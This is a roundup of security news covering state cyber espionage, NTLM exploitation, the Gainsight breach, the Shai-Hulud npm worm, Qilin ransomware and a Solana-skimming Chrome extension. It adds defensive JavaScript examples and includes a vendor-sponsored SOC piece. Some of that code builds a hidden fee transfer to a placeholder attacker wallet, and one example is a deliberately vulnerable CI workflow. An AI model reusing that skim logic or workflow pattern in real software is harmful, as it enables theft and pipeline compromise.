ASIO chief warns of state-backed cyber threats to critical systems

Australian Spy Chief Warns of Cyber Sabotage

Director-General of Security Mike Burgess, the head of Australia’s Security Intelligence Organisation (ASIO), disclosed that threat actors operating on behalf of China’s government and military probed the country’s telecoms network and key infrastructure. Burgess warned that authoritarian regimes “are growing more willing to disrupt or destroy critical infrastructure” using cyber sabotage. Espionage is estimated to have cost the country A$12.5 billion ($8.1 billion) in 2024.

However, China has dismissed the remarks, stating they “spread false narratives and deliberately provoked confrontation.”

Fake mayor jailed for life over massive cyber scam ring

Philippines Sentences Chinese Woman to Jail for Running Scam Compound

Alice Guo, a 35-year-old Chinese woman who posed as a local and was elected as mayor for the city of Bamban in 2022, was sentenced to life in prison after she was found guilty of human trafficking for her role in running a huge cyber scam compound that was operating under online casinos, known locally as Philippine Offshore Gaming Operations (Pogo). Guo, along with three others, was sentenced to life in prison and a fine of 2 million pesos ($33,832).

Old Windows protocol remains key target for credential theft

Threat Actors Continue to Abuse NTLM

Multiple vulnerabilities in Microsoft Windows have been exploited by threat actors to leak NTLM hashes and augment their post-exploitation efforts. These include CVE-2024-43451, which has been abused by BlindEagle and Head Mare, CVE-2025-24054, which has been abused in phishing attacks targeting Russia to deliver Warzone RAT, and CVE-2025-33073, which has been abused in “suspicious activity” against an unnamed target belonging to the financial sector in Uzbekistan.

In this attack, the threat actor exploited the flaw to check whether they had sufficient privileges to execute code, then used batch files to run reconnaissance commands, establish persistence, dump LSASS memory, and attempt, unsuccessfully, to move laterally to an administrative share on another host. No further activity was detected. “While Microsoft has announced plans to phase it out, the protocol’s pervasive presence across legacy systems and enterprise networks keeps it relevant and vulnerable,” Kaspersky said. “Threat actors are actively leveraging newly disclosed flaws to refine credential relay attacks, escalate privileges, and move laterally within networks, underscoring that NTLM still represents a major security liability.” That’s a wrap for this week’s ThreatsDay.

The big picture? Cybercrime is getting faster, smarter, and harder to spot — but awareness still beats panic. Keep your software updated, stay alert for anything that feels off, and don’t click in a hurry. The more we all stay sharp, the harder it gets for attackers to win.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Gainsight Expands Impacted Customer List Following Salesforce Security Alert

Gainsight has disclosed that the recent suspicious activity targeting its applications has affected more customers than previously thought. The company said Salesforce initially provided a list of 3 impacted customers and that it has “expanded to a larger list” as of November 21, 2025. It did not reveal the exact number of customers who were impacted, but its CEO, Chuck Ganapathi, said “we presently know of only a handful of customers who had their data affected.” The development comes as Salesforce warned of detected “unusual activity” related to Gainsight-published applications connected to the platform, prompting the company to revoke all access and refresh tokens associated with them. The breach has been claimed by a notorious cybercrime group known as ShinyHunters (aka Bling Libra).

A number of other precautionary steps have been enacted to contain the incident. This includes Zendesk, Gong.io, and HubSpot temporarily suspending their Gainsight integrations, and Google disabling OAuth clients with callback URIs like gainsightcloud[.]com. HubSpot, in its own advisory, said it found no evidence to suggest any compromise of its own infrastructure or customers. In an FAQ, Gainsight has also listed the products for which the ability to read from and write to Salesforce has been temporarily unavailable:

- Customer Success (CS)
- Community (CC)
- Northpass - Customer Education (CE)
- Skilljar (SJ)
- Staircase (ST)

The company, however, emphasized that Staircase is not affected by the incident and that Salesforce removed the Staircase connection out of caution in response to an ongoing investigation.

Both Salesforce and Gainsight have published indicators of compromise (IoCs) associated with the breach, with one user agent string, “Salesforce-Multi-Org-Fetcher/1.0”, used for unauthorized access, also flagged as previously employed in the Salesloft Drift activity. According to information from Salesforce, reconnaissance efforts against customers with compromised Gainsight access tokens were first recorded from the IP address “3.239.45[.]43” on October 23, 2025, followed by subsequent waves of reconnaissance and unauthorized access starting November 8. To further secure their environments, customers are asked to follow the steps below:

- Rotate the S3 bucket access keys and the credentials of other connectors (BigQuery, Zuora, Snowflake, etc.) used for connections with Gainsight
- Log in to Gainsight NXT directly, rather than through Salesforce, until the integration is fully restored
- Reset NXT user passwords for any users who do not authenticate via SSO
- Re-authorize any connected applications or integrations that rely on user credentials or tokens

“These steps are preventative in nature and are designed to ensure your environment remains secure while the investigation continues,” Gainsight said.
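The published IoCs lend themselves to a quick retrospective sweep of Salesforce login or API-access exports. The following is an added example, not tooling from Salesforce or Gainsight: it scans a constructed tab-separated export (the column names are assumptions; map them to whatever your own export uses) for the published user agent and source IP, and separately marks any session from a Gainsight-published connected app on or after the October 23 reconnaissance date for review, since a token could have been abused from infrastructure other than the one IP that was disclosed.

```javascript
// Added example: sweep an access-log export for the Gainsight-incident IoCs.
// Not Salesforce or Gainsight tooling; the export format is a constructed stand-in.
const IOC_USER_AGENTS = new Set(["Salesforce-Multi-Org-Fetcher/1.0"]);
const IOC_SOURCE_IPS = new Set(["3.239.45.43"]);
// Earliest reconnaissance date reported by Salesforce. Any Gainsight-app session
// from this date on is not proof of abuse, but it deserves a human look.
const WINDOW_START = new Date("2025-10-23T00:00:00Z");

// Parse a tab-separated export with a header row into objects (assumed shape).
function parseRecords(text) {
  const [header, ...rows] = text.trim().split("\n");
  const cols = header.split("\t");
  return rows.map(r => Object.fromEntries(r.split("\t").map((v, i) => [cols[i], v])));
}

// Return the list of reasons a record is interesting; empty list means clean.
function classifyRecord(rec) {
  const reasons = [];
  if (IOC_USER_AGENTS.has(rec.userAgent)) reasons.push("ioc-user-agent");
  if (IOC_SOURCE_IPS.has(rec.sourceIp)) reasons.push("ioc-source-ip");
  const ts = new Date(rec.timestamp);
  if (/gainsight/i.test(rec.connectedApp) && ts >= WINDOW_START) reasons.push("gainsight-app-in-window");
  return reasons;
}

// Hard IoC matches are high severity; in-window Gainsight sessions are "review".
function triage(text) {
  const hits = [];
  for (const rec of parseRecords(text)) {
    const reasons = classifyRecord(rec);
    if (reasons.length === 0) continue;
    const severity = reasons.some(r => r.startsWith("ioc-")) ? "high" : "review";
    hits.push({ ...rec, reasons, severity });
  }
  return hits;
}

// Constructed sample export: one direct IoC hit, one in-window Gainsight session,
// one ordinary user login, and one Gainsight session from before the window.
const SAMPLE_EXPORT = `timestamp\tuser\tsourceIp\tuserAgent\tconnectedApp
2025-10-23T14:02:11Z\tsvc.gainsight@example.com\t3.239.45.43\tSalesforce-Multi-Org-Fetcher/1.0\tGainsight NXT
2025-10-25T09:15:40Z\tjane@example.com\t203.0.113.7\tMozilla/5.0\tSalesforce Lightning
2025-11-08T03:44:19Z\tsvc.gainsight@example.com\t198.51.100.22\tpython-requests/2.31\tGainsight NXT
2025-09-30T11:00:00Z\tsvc.gainsight@example.com\t198.51.100.22\tpython-requests/2.31\tGainsight NXT`;

console.log(triage(SAMPLE_EXPORT));
```

The split between "high" and "review" matters in practice: the exact user agent and IP are cheap for the attacker to change, so treating the in-window connected-app sessions as a review queue, rather than ignoring anything that misses the literal IoCs, is what turns the published indicators into a useful scoping exercise.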

The development comes against the backdrop of a new ransomware-as-a-service (RaaS) platform called ShinySp1d3r (also spelled Sh1nySp1d3r) that’s being developed by Scattered Spider, LAPSUS$, and ShinyHunters (SLSH). Data from ZeroFox has revealed that the cybercriminal alliance has been responsible for at least 51 cyberattacks over the past year. “While the ShinySp1d3r encryptor has some features common to other encryptors, it also boasts features that have never been seen before in the RaaS space,” the company said. “These include: Hooking the EtwEventWrite function to prevent Windows Event Viewer logging, terminating processes that keep files open – which would normally prevent encryption – by iterating over processes before killing them, [and] filling free space in a drive by writing random data contained in a .tmp file, likely to overwrite any deleted files.” ShinySp1d3r also comes with the ability to search for open network shares and encrypt them, as well as propagate to other devices on the local network through deployViaSCM, deployViaWMI, and attemptGPODeployment.

In a report published Wednesday, independent cybersecurity journalist Brian Krebs said the individual responsible for releasing the ransomware is a core SLSH member named “Rey” (aka @ReyXBF ), who is also one of the three administrators of the group’s Telegram channel. Rey was previously an administrator of BreachForums and the data leak website for HellCat ransomware . Rey, whose identity has been unmasked as Saif Al-Din Khader, told Krebs that ShinySp1d3r is a rehash of HellCat that has been modified with artificial intelligence (AI) tools and that he has been cooperating with law enforcement since at least June 2025. “The emergence of a RaaS program, in conjunction with an EaaS [extortion-as-a-service] offering, makes SLSH a formidable adversary in terms of the wide net they can cast against organizations using multiple methods to monetize their intrusion operations,” Palo Alto Networks Unit 42 researcher Matt Brady said .

“Additionally, the insider recruitment element adds yet another layer for organizations to defend against.”


Shai-Hulud v2 Spreads From npm to Maven, as Campaign Exposes Thousands of Secrets

The second wave of the Shai-Hulud supply chain attack has spilled over to the Maven ecosystem after compromising more than 830 packages in the npm registry. The Socket Research Team said it identified a Maven Central package named org.mvnpm:posthog-node:4.18.1 that embeds the same two components associated with Sha1-Hulud: the “setup_bun.js” loader and the main payload “bun_environment.js.” The company told The Hacker News that org.mvnpm:posthog-node:4.18.1 was the only Java package identified so far. “This means the PostHog project has compromised releases in both the JavaScript/npm and Java/Maven ecosystems, driven by the same Shai Hulud v2 payload,” the cybersecurity company said in a Tuesday update. It’s worth noting that the Maven Central package is not published by PostHog itself.

Rather, the “org.mvnpm” coordinates are generated by an automated mvnpm process that rebuilds npm packages as Maven artifacts. Maven Central said it is working to implement extra protections to prevent already-known compromised npm components from being rebundled. As of November 25, 2025, 22:44 UTC, all mirrored copies have been purged. The development comes as the “second coming” of the supply chain incident has targeted developers globally with the aim of stealing sensitive data like API keys, cloud credentials, and npm and GitHub tokens, and facilitating deeper supply chain compromise in a worm-like fashion.

The latest iteration has also evolved to be more stealthy, aggressive, scalable, and destructive. Besides borrowing the overall infection chain of the initial September variant, the attack allows threat actors to gain unauthorized access to npm maintainer accounts and publish trojanized versions of their packages. When unsuspecting developers download and run these libraries, the embedded malicious code backdoors their machines, scans for secrets, and exfiltrates them to GitHub repositories using the stolen tokens. The attack accomplishes this by injecting two rogue workflows, one of which registers the victim machine as a self-hosted runner and enables arbitrary command execution whenever a GitHub Discussion is opened.

A second workflow is designed to systematically harvest all secrets. Over 28,000 repositories have been affected by the incident. “This version significantly enhances stealth by utilizing the Bun runtime to hide its core logic and increases its potential scale by raising the infection cap from 20 to 100 packages,” Cycode’s Ronen Slavin and Roni Kuznicki said . “It also uses a new evasion technique, exfiltrating stolen data to randomly named public GitHub repositories instead of a single, hard-coded one.” The attacks illustrate how trivial it is for attackers to take advantage of trusted software distribution pathways to push malicious versions at scale and compromise thousands of downstream developers.

What’s more, the self-replicating nature of the malware means a single infected account is enough to amplify the blast radius of the attack and turn it into a widespread outbreak in a short span of time. Further analysis by Aikido has uncovered that the threat actors exploited CI misconfigurations in existing GitHub Actions workflows, specifically in pull_request_target and workflow_run workflows, to pull off the attack and compromise projects associated with AsyncAPI, PostHog, and Postman. The vulnerable workflow “used the risky pull_request_target trigger in a way that allowed code supplied by any new pull request to be executed during the CI run,” security researcher Ilyas Makari said. “A single misconfiguration can turn a repository into a patient zero for a fast-spreading attack, giving an adversary the ability to push malicious code through automated pipelines you rely on every day.” It’s assessed that the activity is the continuation of a broader set of attacks targeting the ecosystem that commenced with the August 2025 S1ngularity campaign impacting several Nx packages on npm.
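The misconfiguration Aikido describes is easy to state and easy to check for: a workflow triggered by pull_request_target (or workflow_run) runs in the base repository's context with its permissions and secrets, so if the same workflow also checks out the pull request's head commit and then executes anything the PR author controls (an npm install runs lifecycle scripts from the PR's package.json), the author has code execution with those secrets. The following is an added example, not Aikido's scanner or any of the affected projects' code: a deliberately simple line-based audit that flags that combination in two constructed workflows, one vulnerable and one hardened. It uses regular expressions rather than a YAML parser so that it runs stand-alone; it does follow `run: |` blocks, but a real scanner should parse the YAML and also look inside composite actions and reusable workflows.

```javascript
// Added example: line-based audit for the pull_request_target / workflow_run
// misconfiguration described above. Illustrative only (not Aikido's tooling):
// regexes stand in for a YAML parser.
const RISKY_TRIGGERS = ["pull_request_target", "workflow_run"];
// Checkout inputs that point at the untrusted pull request (or its fork).
const UNTRUSTED_REF = /github\.event\.pull_request\.head\.(sha|ref|repo)|github\.head_ref|github\.event\.workflow_run\.head_(sha|branch)/;
// Commands that execute code controlled by whoever authored the checked-out tree
// (npm lifecycle scripts, build tools, repository-local executables).
const RUNS_REPO_CODE = /(npm (ci|install|run)|yarn|pnpm|pip install|\bmake\b|\.\/)/;

function auditWorkflow(yamlText) {
  const triggers = [];
  let inOn = false, inCheckout = false, inRun = false;
  let untrustedCheckout = false, executesAfterCheckout = false, usesSecrets = false;

  for (const line of yamlText.split("\n")) {
    if (/^on:/.test(line)) inOn = true;          // top-level trigger block starts
    else if (/^\S/.test(line)) inOn = false;     // any other top-level key ends it
    if (inOn) {
      for (const t of RISKY_TRIGGERS) {
        if (new RegExp(`\\b${t}\\b`).test(line) && !triggers.includes(t)) triggers.push(t);
      }
      continue;
    }
    if (/^\s*-\s/.test(line)) { inCheckout = false; inRun = false; }   // a new step begins
    if (/uses:\s*actions\/checkout/.test(line)) inCheckout = true;
    if (inCheckout && /^\s*(ref|repository):/.test(line) && UNTRUSTED_REF.test(line)) untrustedCheckout = true;
    if (/^\s*-?\s*run:/.test(line)) inRun = true;  // single-line "run:" and "run: |" blocks
    if (untrustedCheckout && inRun && RUNS_REPO_CODE.test(line)) executesAfterCheckout = true;
    if (/secrets\./.test(line)) usesSecrets = true;
  }

  const findings = [];
  if (triggers.length && untrustedCheckout && executesAfterCheckout) {
    findings.push({ rule: "untrusted-code-execution", triggers, usesSecrets,
      detail: "privileged trigger + checkout of PR head + execution of repo-controlled code" });
  } else if (triggers.length && untrustedCheckout) {
    findings.push({ rule: "untrusted-checkout", triggers, usesSecrets,
      detail: "privileged trigger checks out PR head; review every later step" });
  }
  return findings;
}

// Constructed workflows. "\${{" is escaped only because they live in JS template literals.
const VULNERABLE_WORKFLOW = `name: PR checks
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: \${{ github.event.pull_request.head.sha }}
      - run: npm ci && npm test
        env:
          NPM_TOKEN: \${{ secrets.NPM_TOKEN }}
`;

// Hardened: plain pull_request runs fork PRs without secrets or write access,
// and the token is read-only even for same-repo PRs.
const HARDENED_WORKFLOW = `name: PR checks
on:
  pull_request:
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
`;

console.log(auditWorkflow(VULNERABLE_WORKFLOW)); // one "untrusted-code-execution" finding
console.log(auditWorkflow(HARDENED_WORKFLOW));   // []
```

The `usesSecrets` flag is reported rather than used as a gate on purpose: even without an explicit `secrets.` reference, pull_request_target hands the job a GITHUB_TOKEN with the base repository's default permissions, which is enough for an attacker to push commits or publish releases if that default is write.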

“As a new and significantly more aggressive wave of npm supply chain malware, Shai-Hulud 2 combines stealthy execution, credential breadth, and fallback destructive behavior, making it one of the most impactful supply chain attacks of the year,” Nadav Sharkazy, a product manager at Apiiro , said in a statement. “This malware shows how a single compromise in a popular library can cascade into thousands of downstream applications by trojanizing legitimate packages during installation.” Data compiled by GitGuardian , OX Security , and Wiz shows that the campaign has leaked hundreds of GitHub access tokens and credentials associated with Amazon Web Services (AWS), Google Cloud, and Microsoft Azure. More than 5,000 files were uploaded to GitHub with the exfiltrated secrets. GitGuardian’s analysis of 4,645 GitHub repositories has identified 11,858 unique secrets, out of which 2,298 remained valid and publicly exposed as of November 24, 2025.

Users are advised to rotate all tokens and keys, audit all dependencies, remove compromised versions, reinstall clean packages, and harden developer and CI/CD environments with least-privilege access, secret scanning, and automated policy enforcement. “Sha1-Hulud is another reminder that the modern software supply chain is still way too easy to break,” Dan Lorenc, co-founder and CEO of Chainguard, said. “A single compromised maintainer and a malicious install script is all it takes to ripple through thousands of downstream projects in a matter of hours.” “The techniques attackers are using are constantly evolving. Most of these attacks don’t rely on zero-days.

They exploit the gaps in how open source software is published, packaged, and pulled into production systems. The only real defense is changing the way software gets built and consumed.”

Qilin Ransomware Turns South Korean MSP Breach Into 28-Victim ‘Korean Leaks’ Data Heist

South Korea’s financial sector has been targeted by what has been described as a sophisticated supply chain attack that led to the deployment of Qilin ransomware. “This operation combined the capabilities of a major Ransomware-as-a-Service (RaaS) group, Qilin, with potential involvement from North Korean state-affiliated actors (Moonstone Sleet), leveraging Managed Service Provider (MSP) compromise as the initial access vector,” Bitdefender said in a report shared with The Hacker News. Qilin has emerged as one of the most active ransomware operations this year, with the RaaS crew exhibiting “explosive growth” in the month of October 2025 by claiming over 180 victims . The group is responsible for 29% of all ransomware attacks, per data from NCC Group .

The Romanian cybersecurity company said it decided to dig deeper after uncovering an unusual spike in ransomware victims from South Korea in September 2025, when it became the second-most affected country by ransomware after the U.S., with 25 cases, a significant jump from an average of about 2 victims per month between September 2024 and August 2025. Further analysis found that all 25 cases were attributed exclusively to the Qilin ransomware group, with 24 of the victims in the financial sector. The campaign was given the moniker Korean Leaks by the attackers themselves. While Qilin’s origins are likely Russian, the threat actors self-identify as “political activists” and “patriots of the country.” It follows a traditional affiliate model, which involves recruiting a diverse group of hackers to carry out the attacks in return for taking a small share of up to 20% of the illicit payments.

One particular affiliate of note is a North Korean state-sponsored actor tracked as Moonstone Sleet , which, according to Microsoft, has deployed a custom ransomware variant called FakePenny in an attack targeting an unnamed defense technology company in April 2024. Then, earlier this February, a significant pivot occurred when the adversary was observed delivering Qilin ransomware at a limited number of organizations. While it’s not exactly clear if the latest set of attacks was indeed carried out by the hacking group, the targeting of South Korean businesses aligns with its strategic objectives. Korean Leaks took place over three publication waves, resulting in the theft of over 1 million files and 2 TB of data from 28 victims.

Victim posts associated with four other entities were removed from the data leak site (DLS), suggesting that they may have been taken down either following ransom negotiations or under a unique internal policy, Bitdefender said. The three waves are as follows:

- Wave 1, comprising 10 victims from the financial management sector, published on September 14, 2025
- Wave 2, comprising nine victims published between September 17 and 19, 2025
- Wave 3, comprising nine victims published between September 28 and October 4, 2025

An unusual aspect of these leaks is the departure from the established tactic of exerting pressure on compromised organizations, leaning heavily instead on propaganda and political language. “The entire campaign was framed as a public-service effort to expose systemic corruption, exemplified by the threats to release files that could be ‘evidence of stock market manipulation’ and names of ‘well-known politicians and businessmen in Korea,’” Bitdefender said of the first wave of the campaign. Subsequent waves escalated the threat a notch higher, claiming that the leak of the data could pose a severe risk to the Korean financial market.

The actors also called on South Korean authorities to investigate the case, citing stringent data protection laws. A further shift in messaging was observed in the third wave, where the group initially continued the same theme of a national financial crisis resulting from the release of stolen information, but then switched to a language that “more closely resembled Qilin’s typical, financially motivated extortion messages.” Given that Qilin boasts of an “in-house team of journalists” to help affiliates with writing texts for blog posts and help apply pressure during negotiations, it’s assessed that the group’s core members were behind the publication of the DLS text. “The posts contain several of the core operator’s signature grammatical inconsistencies,” Bitdefender said. “However, this control over the final draft does not mean the affiliate was excluded from having a critical say in the key messaging or overall direction of the content.” To pull off these attacks, the Qilin affiliate is said to have breached a single upstream managed service provider (MSP), leveraging the access to compromise several victims at once.

On September 23, 2025, the Korea JoongAng Daily reported that more than 20 asset management companies in the country were infected with ransomware following the compromise of GJTec. To mitigate these risks, organizations should enforce multi-factor authentication (MFA), apply the principle of least privilege (PoLP) to restrict access, segment critical systems and sensitive data, and take proactive steps to reduce their attack surface. “The MSP compromise that triggered the ‘Korean Leaks’ operation highlights a critical blind spot in cybersecurity discussions,” Bitdefender said. “Exploiting a vendor, contractor, or MSP that has access to other businesses is a more prevalent and practical route that RaaS groups seeking clustered victims can take.”

When Your $2M Security Detection Fails: Can your SOC Save You?

Enterprises today are expected to have at least 6-8 detection tools, as detection is considered a standard investment and the first line of defense. Yet security leaders struggle to justify dedicating resources further down the alert lifecycle to their superiors. As a result, most organizations’ security investments are asymmetrical, robust detection tools paired with an under-resourced SOC, their last line of defense. A recent case study demonstrates how companies with a standardized SOC prevented a sophisticated phishing attack that bypassed leading email security tools.

In this case study, a cross-company phishing campaign targeted C-suite executives at multiple enterprises. Eight different email security tools across these organizations failed to detect the attack, and phishing emails reached executive inboxes. However, each organization’s SOC team detected the attack immediately after employees reported the suspicious emails. Why did all eight detection tools identically fail where the SOC succeeded?

What all these organizations have in common is a balanced investment across the alert lifecycle, one that doesn’t neglect their SOC. This article examines how investing in the SOC is indispensable for organizations that have already allocated significant resources to detection tools, and how a balanced SOC investment is crucial for maximizing the value of those existing detection investments.

Detection tools and the SOC operate in parallel universes

Understanding this fundamental disconnect explains how security gaps arise. Detection tools operate in milliseconds.

They must make instant decisions on millions of signals every day. They have no time for nuance; speed is essential. Without it, networks would come to a halt, as every email, file, and connection request would be held up for analysis. Detection tools zoom in.

They are the first to identify and isolate potential threats, but they lack an understanding of the bigger picture. SOC teams, by contrast, operate with a 30,000-foot view. When alerts reach analysts, they have something detection tools lack: time and context. Consequently, the SOC tackles alerts from a different perspective. They can analyze behavioral patterns, such as why an executive suddenly logs in from a datacenter IP address when they usually work from London.

They can stitch data across tools, viewing an email from a domain with a clean reputation alongside the subsequent authentication attempts and user reports. They can identify patterns that only make sense when seen together, such as exclusive targeting of finance executives combined with timing that aligns with payroll cycles.

Three critical risks of an underfunded SOC

First, it can make it more difficult for executive leadership to identify the root of the problem.

CISOs and budget holders in organizations that deploy various detection tools often assume their investments will keep them safe. Meanwhile, the SOC experiences this differently, overwhelmed by noise and lacking the resources to properly investigate real threats. Because detection spending is obvious, while SOC struggles happen behind closed doors, security leaders find it challenging to demonstrate the need for additional investment in their SOC. Second, the asymmetry overwhelms the last line of defense.

Significant investments in multiple detection tools produce thousands of alerts that flood the SOC every day. With underfunded SOCs, analysts become goalies facing hundreds of shots at once, forced to make split-second decisions under immense pressure. Third, it undermines the ability to identify nuanced threats. When the SOC is overwhelmed by alerts, the capacity for detailed investigative work is lost.

The threats that escape detection are the ones that detection tools would never catch in the first place.

From temporary fixes to sustainable SOC operations

When detection tools generate hundreds of alerts daily, adding a few more SOC analysts is as effective as trying to save a sinking ship with a bucket. The traditional alternative has been outsourcing to MSSPs or MDR providers and assigning external teams to handle the overflow. But for many, the trade-offs are still too steep: high ongoing costs, shallow investigations by analysts unfamiliar with your environment, coordination delays, and broken communication.

Outsourcing doesn’t fix the imbalance; it just shifts the burden onto someone else’s plate. Today, AI SOC platforms are becoming the preferred choice for organizations with lean SOC teams looking for an efficient, cost-effective, and scalable solution. AI SOC platforms operate at the investigation layer where contextual reasoning happens, automate alert triage, and surface only high-fidelity incidents after assigning them context. With the help of AI SOC, analysts save hundreds of hours each month, as false-positive rates often drop by more than 90%.

This automated coverage enables small internal teams to provide 24/7 coverage without additional staffing or outsourcing. The companies featured in this case study invested in this approach through Radiant Security, an agentic AI SOC platform.

2 ways SOC investment pays off, now and later

SOC investments make the cost of detection tools worthwhile. Your detection tools are only as effective as your ability to investigate their alerts.

When 40% of alerts go uninvestigated, you’re not getting the full value of every detection tool you own. Without sufficient SOC capacity, you’re paying for detection capabilities that you can’t fully utilize. The last line’s unique perspective will become increasingly critical. SOC will become increasingly essential as detection tools fail more often.

As attacks grow more sophisticated, detection will need more context. Only the SOC’s perspective can connect these dots and see the entire picture.

3 questions to guide your next security budget

Is your security investment symmetric? Begin by assessing your resource allocation for imbalance.

The first indication of asymmetrical security is having more alerts than your SOC can handle. If your analysts are overwhelmed by alerts, your frontline is outrunning your backline.

Is your SOC a qualified safety net? Every SOC leader must ask: if detection fails, is the SOC prepared to catch what gets through?

Many organizations never ask this because they don’t see detection as the SOC’s responsibility. But when detection tools fail, responsibilities shift.

Are you underutilizing existing tools? Many organizations find that their detection tools produce valuable signals that no one has time to investigate.

Asymmetry means lacking the ability to act on what you already possess.

Key takeaways from Radiant Security

Most security teams have the opportunity to allocate resources to maximize ROI from their current detection investments, support future growth, and enhance protection. Organizations that invest in detection tools but neglect their SOC create blind spots and burnout. Radiant Security, the agentic AI SOC platform highlighted in the case study, shows success through balanced security investment.

Radiant works at the SOC investigation layer, automatically triaging every alert, cutting false positives by about 90%, and analyzing threats at machine speed, like a top analyst. With over 100 integrations with existing security tools and one-click response features, Radiant helps lean security teams investigate any alert, known or unknown, without needing impossible headcount increases. Radiant Security makes enterprise-grade SOC capabilities available to organizations of any size.

This article is a contributed piece from one of our valued partners.

Chrome Extension Caught Injecting Hidden Solana Transfer Fees Into Raydium Swaps

Cybersecurity researchers have discovered a new malicious extension on the Chrome Web Store that’s capable of injecting a stealthy Solana transfer into a swap transaction and transferring the funds to an attacker-controlled cryptocurrency wallet. The extension, named Crypto Copilot , was first published by a user named “sjclark76” on May 7, 2024. The developer describes the browser add-on as offering the ability to “trade crypto directly on X with real-time insights and seamless execution.” The extension has 12 installs and remains available for download as of writing. “Behind the interface, the extension injects an extra transfer into every Solana swap, siphoning a minimum of 0.0013 SOL or 0.05% of the trade amount to a hardcoded attacker-controlled wallet,” Socket security researcher Kush Pandya said in a Tuesday report.

Specifically, the extension incorporates obfuscated code that comes to life when a user performs a Raydium swap, manipulating it to inject an undisclosed SOL transfer into the same signed transaction. Raydium is a decentralized exchange (DEX) and automated market maker (AMM) built on the Solana blockchain. The code works by appending a hidden SystemProgram.transfer instruction to each swap before the user’s signature is requested, sending the fee to a hard-coded wallet embedded in the code; because the transfer rides inside the transaction the user is already being asked to sign, a single approval authorizes both the swap and the skim. The fee is calculated from the amount traded: a flat 0.0013 SOL for trades of up to 2.6 SOL, and 0.05% of the swap amount for larger trades (0.05% of 2.6 SOL is exactly 0.0013 SOL, so the two tiers meet at that threshold).

To avoid detection, the malicious behavior is concealed using techniques like minification and variable renaming. The extension also communicates with a backend hosted on the domain “crypto-coplilot-dashboard.vercel[.]app” to register connected wallets, fetch points and referral data, and report user activity. The domain, along with “cryptocopilot[.]app,” does not host any real product. What’s notable about the attack is that users are completely kept in the dark about the hidden platform fee, and the user interface only shows details of the swap.

Furthermore, Crypto Copilot makes use of legitimate services like DexScreener and Helius RPC to lend it a veneer of trust. “Because this transfer is added silently and sent to a personal wallet rather than a protocol treasury, most users will never notice it unless they inspect each instruction before signing,” Pandya said. “The surrounding infrastructure appears designed only to pass Chrome Web Store review and provide a veneer of legitimacy while siphoning fees in the background.”
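Pandya's point, that the skim is only visible to someone who inspects each instruction before signing, can be turned into a pre-signing check. The following is an added example, not the extension's code and not Socket's analysis tooling: it models a transaction as a list of instructions in a simplified shape (program ID, account keys, raw data bytes), decodes System Program transfers using the real wire format (a 4-byte little-endian instruction index of 2 followed by an 8-byte little-endian lamport amount), and reports any transfer whose destination is not on the wallet's allow-list. The swap program ID, the wallet addresses and the swap instruction data are constructed placeholders; hiddenFeeLamports reproduces the two-tier fee rule described above, and buildSkimmedSwap assembles the kind of transaction the extension is reported to present.

```javascript
// Added example: audit a Solana transaction's instructions before signing,
// reporting System Program transfers to destinations the user did not expect.
// The instruction shape is a simplified stand-in for what @solana/web3.js
// exposes (programId, keys, data); this is not the Crypto Copilot code.
const SYSTEM_PROGRAM_ID = "11111111111111111111111111111111"; // real System Program ID
const SYSTEM_TRANSFER_INDEX = 2;                                // real Transfer instruction index
const LAMPORTS_PER_SOL = 1_000_000_000;

// Constructed placeholders, not real on-chain addresses.
const SWAP_PROGRAM_ID = "SwapProgramPlaceholder1111111111111111111111";
const USER_WALLET = "UserWalletPlaceholder11111111111111111111111";
const USER_WSOL = "UserWsolAccountPlaceholder11111111111111111";
const ATTACKER_WALLET = "AttackerWalletPlaceholder1111111111111111111";

// System Program Transfer payload: u32 LE index (2) followed by u64 LE lamports.
function encodeTransfer(lamports) {
  const data = Buffer.alloc(12);
  data.writeUInt32LE(SYSTEM_TRANSFER_INDEX, 0);
  data.writeBigUInt64LE(BigInt(lamports), 4);
  return data;
}

// Decode a System Program Transfer; null for any other instruction.
function decodeSystemTransfer(ix) {
  if (ix.programId !== SYSTEM_PROGRAM_ID || ix.data.length !== 12) return null;
  if (ix.data.readUInt32LE(0) !== SYSTEM_TRANSFER_INDEX) return null;
  return { from: ix.keys[0], to: ix.keys[1], lamports: Number(ix.data.readBigUInt64LE(4)) };
}

// The two-tier skim: flat 1,300,000 lamports (0.0013 SOL) for trades up to
// 2.6 SOL, then 0.05% of the trade. Integer math avoids floating-point drift.
function hiddenFeeLamports(tradeLamports) {
  return Math.max(1_300_000, Math.floor((tradeLamports * 5) / 10_000));
}

// The transaction the extension is reported to present: the genuine swap leg
// followed by a silently appended transfer to the hard-coded wallet.
function buildSkimmedSwap(tradeLamports) {
  return [
    { programId: SWAP_PROGRAM_ID, keys: [USER_WALLET, USER_WSOL], data: Buffer.from([9, 0, 0, 0]) }, // opaque swap data (constructed)
    { programId: SYSTEM_PROGRAM_ID, keys: [USER_WALLET, ATTACKER_WALLET], data: encodeTransfer(hiddenFeeLamports(tradeLamports)) },
  ];
}

// Pre-signing audit: every System transfer must go to an account the user owns
// or a destination they explicitly expect; anything else is reported with its index.
function auditBeforeSigning(instructions, expectedDestinations) {
  const allowed = new Set(expectedDestinations);
  const findings = [];
  instructions.forEach((ix, index) => {
    const t = decodeSystemTransfer(ix);
    if (t && !allowed.has(t.to)) findings.push({ index, from: t.from, to: t.to, sol: t.lamports / LAMPORTS_PER_SOL });
  });
  return findings;
}

// Usage: a 10 SOL swap where only the user's own accounts are expected destinations.
console.log(auditBeforeSigning(buildSkimmedSwap(10 * LAMPORTS_PER_SOL), [USER_WALLET, USER_WSOL]));
```

A wallet that surfaced this list next to the swap summary would make the 0.005 SOL leg obvious; the reason the extension's fee stays hidden is that the confirmation UI it controls only renders the swap. Checks like this belong in the wallet or in an independent simulation step, never in the dApp or extension that built the transaction.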

RomCom Uses SocGholish Fake Update Attacks to Deliver Mythic Agent Malware

The threat actors behind a malware family known as RomCom targeted a U.S.-based civil engineering company via a JavaScript loader dubbed SocGholish to deliver the Mythic Agent. “This is the first time that a RomCom payload has been observed being distributed by SocGholish,” Arctic Wolf Labs researcher Jacob Faires said in a Tuesday report. The activity has been attributed with medium-to-high confidence to Unit 29155 of Russia’s Main Directorate of the General Staff of the Armed Forces of the Russian Federation, also known as GRU. According to the cybersecurity company, the targeted entity had worked for a city with close ties to Ukraine in the past.

